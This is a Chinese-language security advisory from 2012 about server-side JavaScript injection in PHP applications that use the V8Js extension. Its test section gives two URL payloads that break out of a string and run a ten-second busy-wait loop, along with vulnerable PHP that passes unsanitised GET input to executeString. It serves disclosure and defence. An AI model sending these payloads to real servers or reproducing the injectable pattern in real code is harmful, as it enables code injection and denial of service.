Google V8服务器端JavaScript注入漏洞
发布日期:2012-02-25
更新日期:2012-02-28
受影响系统:
Google V8 JavaScript Engine
描述:
--------------------------------------------------------------------------------
Chromium是开源Web浏览器项目。V8是Google的开源JavaScript引擎。
Google的V8服务器端引擎在实现上存在SSJS漏洞,攻击者通过PHP中的服务器端JavaScript注入漏洞导致注入任意代码。
<*来源:Felipe Aragon ([email protected])
链接:http://packetstormsecurity.org/files/110210/Google-V8-Server-Side-Javascript-Injection.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
vulnerable.php?msg=a';d%20=%20new%20Date();do{cd=new%20Date();}while(cd-d<10000);foo='bar
Vulnerable Code:
$msg = $_GET['msg'];
$v8 = new V8Js();
$v8->executeString("var msg = '$msg'; ..SOME CODE..");
vulnerable.php?msg=version());d%20=%20new%20Date();do{cd=new%20Date();}while(cd-d<10000);foo=('bar'
Vulnerable Code:
$msg = $_GET['msg'];
$v8 = new V8Js();
$JS = <<< EOT
len = print($msg + "\\n");
..SOME CODE..
EOT;
$v8->executeString($JS, 'basic.js');
建议:
--------------------------------------------------------------------------------
厂商补丁:
Google
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: